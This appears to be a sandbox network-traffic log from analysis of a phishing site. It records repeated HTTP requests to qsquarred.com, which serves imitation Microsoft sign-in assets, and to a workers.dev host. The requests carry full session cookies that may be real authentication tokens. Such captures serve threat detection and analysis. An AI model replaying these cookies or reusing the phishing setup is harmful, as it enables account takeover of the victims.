      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_r1sg5sxlkljjoa22hvk04g2.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: portal.microsoftonline.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_80e93b9a4cb13643afca.js HTTP/1.1Host: qsquarred.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://qsquarred.com/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://248d0d7c.b6979dc2a0c182f7ec7a4aa7.workers.dev/?_kx=tT2g7RhPaXrh3A6Bckepfg.WnBBDPAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: qsquarred.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msftauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: qsquarred.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=FYkJ8F4TTrkT; qPdM.sig=5iLODd9RthlxLH7D-f1dZIMjvvc; buid=1.AQ8AqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAAPAA.AQABGgEAAABVrSpeuWamRam2jAF1XRQElCjVFG8U-dxQHQ3J0JlY0vcoN9OM24GriTruVEXNu6vOIlXCvf2OwQxLJBQkz9onYUUfwXUugFTVChaa5T3LTTTQMNYcUjIHCu0Xbs09PZ4gAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQE58Dy3shl5dC-ht9vvXz8mqCNdrS_yYwTDyMTOs9jIAUBeJ6q9lCoRgRcd17ZhEE_XAxuI27K4NWqoiGwXJE8rYFQkFizMwvsBxATDyNsuVNBvv98E92Aqn0LnQT9hcaBNJ7od8eOT1MlkW7yyt1iM_wSXuwTy-x5ZvkSB8q8yUYgAA; esctx-kczYCLPbBOY=AQABCQEAAABVrSpeuWamRam2jAF1XRQE00M5NVJEAe2d_IjGsOZuLCgCxdXfKqoMHj1ef_kVPBFqcBHuNO3Q4aUOUsEUY4R8lT1jHT-9-9fnm1QXvFnNjFteq7SMElAmM0qhp-F5F6RAW4sBHzBDRYE1C8SN3R7T1J6R0fnUsm1BKrZ17Mdn4yAA; fpc=Ag7JDEp-NZ5HrrX0nOibxdO4vjNwAQAAAD1vd98OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; ak_bmsc=9B848C52FE8198453A00964537BEFB1E~000000000000000000000000000000~YAAQ72jJF6CxHtWVAQAAr7dd2Bs1+Syq+oMC//S3WBxG+1l3dy/eS7GWUfF3PT7Axso3T3ilWmS43APmbSNXFdys1k/gWp5Oau9ZuHtq3XD3TQXQh9jAUYNiFkV0Jr+STi2ekVJXdqLeGotXSvsQoMXZp1gUlA/liTWsX1tvFKXsid1nyAcvTGv/J2cgSNkOfG6bZVdHNaVG1U3uEBWn9ziv3owtSnnMyR12SwVNStsATn14hR7inI39OzSyprnZGUYzXBIF5Y0ZtWJSISSMlxsaUo2GU4tniMToO+iTY66NlatD3Qk8UMRdtbP7joM7zwHqYFKBZM+XrvGkP8NQmcwcNOyjLr2ehxsB; brcap=0
